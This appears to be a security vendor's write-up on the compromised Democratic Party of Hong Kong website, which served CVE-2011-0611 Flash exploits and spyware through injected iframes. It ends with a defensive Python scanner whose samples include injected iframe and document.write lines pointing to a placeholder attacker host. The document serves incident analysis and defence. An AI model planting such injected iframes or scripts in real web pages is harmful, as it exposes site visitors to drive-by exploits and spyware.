Democratic Party of Hong Kong Website Compromised and Serving Spyware

The Democratic Party of Hong Kong’s website was compromised and malware was uploaded to the web server. Interestingly, the server was distributing malicious Flash files and spyware nearly identical to those found on the compromised UK Amnesty International servers at the beginning of this month. The server is being cleaned up.

The English version of the website did not include the injected iframe links pointing to the exploit.html page, which in turn delivers three different version-appropriate malicious Flash variants detected by Kaspersky as “Exploit.SWF.CVE-2011-0611”. The malicious Flash files were 0day at the beginning of this month, and will be effective on unpatched systems.

While it’s interesting that the security team researching the previous incident thought that the technique for delivering the payload to the hard drive deserves a new term, “drive-by caching”, it’s also incorrect to think that this minor tweak raises the bar for security products to prevent the attack – Kaspersky’s detection and prevention for the 0day Flash files was released weeks before the Adobe patches. In other words, the attacks are being stopped just the same by Kaspersky products.

If one of the malicious Flash files succeeds in downloading and executing the newsvine.jp2 file hosted on the server, it immediately drops a couple of files, pe.dll and srvlic.dll. These files are loaded, and the Delphi component decrypts its more sensitive information in memory and phones the collected information off of the system to a drop server. The drop server is not active at this point.

Because so many individuals run vulnerable versions of Adobe Flash and infrequently update their software, and because CVE-2011-0611 was just patched this month, the attackers had a pretty good chance of hitting their targets. Political groups continue to be an active target of cyberattacks this year.

UPDATE: we had a few final links to clean up from the standard suckerfish.js script on the server’s home page. These same malicious links, leading to a third-party server at thesaj(dot)com hosting malicious Flash detected by Kaspersky as Exploit.SWF.CVE-2011-0611.u and Exploit.SWF.CVE-2011-0611.v, were injected into and cleaned from “The Taiwan Brain Trust” web site a couple of weeks ago. The “Trust” is a group in Taiwan that “…provides policy analysis and recommendations to decision-makers in government, multinational corporations, private enterprises and civil society”, making it another compromised high-value political target.
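The infection chain described above rests on two artifacts a site owner can check for: iframe links injected into pages and links planted inside a legitimate script such as suckerfish.js, both pointing at an off-site exploit page or Flash file. The following scanner is an added example, not Kaspersky’s tooling or the cleanup script used here; it walks a page for hidden or off-site iframes, off-site script sources and off-site .swf objects, and pulls off-site absolute URLs out of a JavaScript file. The host names (attacker.example, www.dphk.example, partner.dphk.example) and the sample page and script are constructed placeholders.

```python
"""Scan HTML pages and JavaScript files for injected off-site references.

Added example, not the site's or Kaspersky's code. Looks for the pattern in
the write-up: hidden or off-site iframes (exploit page), off-site <script src>,
off-site .swf objects, and absolute URLs smuggled into a site script.
All host names and sample inputs below are constructed placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SWF_RE = re.compile(r"\.swf(\?|$)", re.IGNORECASE)
# Quoted JS string literals that hold an absolute http(s) URL.
JS_URL_RE = re.compile(r"""["'](https?://[^"']+)["']""", re.IGNORECASE)


def _off_site(url, allowed_hosts):
    """Return the host if the URL points outside the allowed hosts, else None."""
    host = urlparse(url).hostname
    if host is None:            # relative URL: same site, not a finding
        return None
    host = host.lower()
    return None if host in allowed_hosts else host


class _RefCollector(HTMLParser):
    """Collect tags that can pull external content into a page."""

    def __init__(self):
        super().__init__()
        self.refs = []          # list of (tag, attrs dict) in document order

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "script", "embed", "object", "param"):
            self.refs.append((tag, dict(attrs)))


def _is_hidden(attrs):
    """Heuristic: zero/one-pixel or display:none iframes are classic injections."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    dims = [attrs.get("width") or "", attrs.get("height") or ""]
    return ("display:none" in style or "visibility:hidden" in style
            or any(d.strip() in ("0", "0px", "1", "1px") for d in dims))


def scan_html(html, allowed_hosts):
    """Return (reason, url) findings for one HTML page."""
    allowed = {h.lower() for h in allowed_hosts}
    collector = _RefCollector()
    collector.feed(html)
    findings = []
    for tag, attrs in collector.refs:
        url = attrs.get("src") or attrs.get("data") or attrs.get("value") or ""
        if not url:
            continue
        host = _off_site(url, allowed)
        if tag == "iframe":
            if _is_hidden(attrs):
                findings.append(("hidden iframe", url))
            elif host:
                findings.append(("off-site iframe to %s" % host, url))
        elif tag == "script" and host:
            findings.append(("off-site script from %s" % host, url))
        if SWF_RE.search(url) and host:
            findings.append(("off-site Flash object from %s" % host, url))
    return findings


def scan_js(js, allowed_hosts):
    """Return off-site absolute URLs found in string literals of a script."""
    allowed = {h.lower() for h in allowed_hosts}
    return [u for u in JS_URL_RE.findall(js) if _off_site(u, allowed)]


# Constructed sample page mimicking the injection pattern (placeholder hosts).
SAMPLE_PAGE = """<html><head>
<script src="/js/suckerfish.js"></script>
<script src="http://cdn.attacker.example/count.js"></script>
</head><body>
<iframe src="http://attacker.example/exploit.html" width="0" height="0"></iframe>
<object data="http://attacker.example/bad.swf"></object>
<iframe src="http://partner.dphk.example/widget.html" width="300" height="200"></iframe>
</body></html>"""

# Constructed menu script with one planted off-site iframe (placeholder hosts).
SAMPLE_JS = r'''var home = 'http://www.dphk.example/menu'; document.write('<iframe src="http://attacker.example/exploit.html">');'''

ALLOWED_HOSTS = ["www.dphk.example", "partner.dphk.example"]

if __name__ == "__main__":
    for reason, url in scan_html(SAMPLE_PAGE, ALLOWED_HOSTS):
        print("page:", reason, url)
    for url in scan_js(SAMPLE_JS, ALLOWED_HOSTS):
        print("script: off-site URL", url)
```

Run it against each page and script on the server with the allowed host list set to the site’s own domains and CDNs; a same-site iframe of normal size produces no finding, while the hidden iframe, the off-site script and the off-site .swf object in the sample each do. Because the write-up notes that the English pages lacked the iframes while suckerfish.js still carried the links, the script scan is the part that would have caught the leftovers mentioned in the update.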
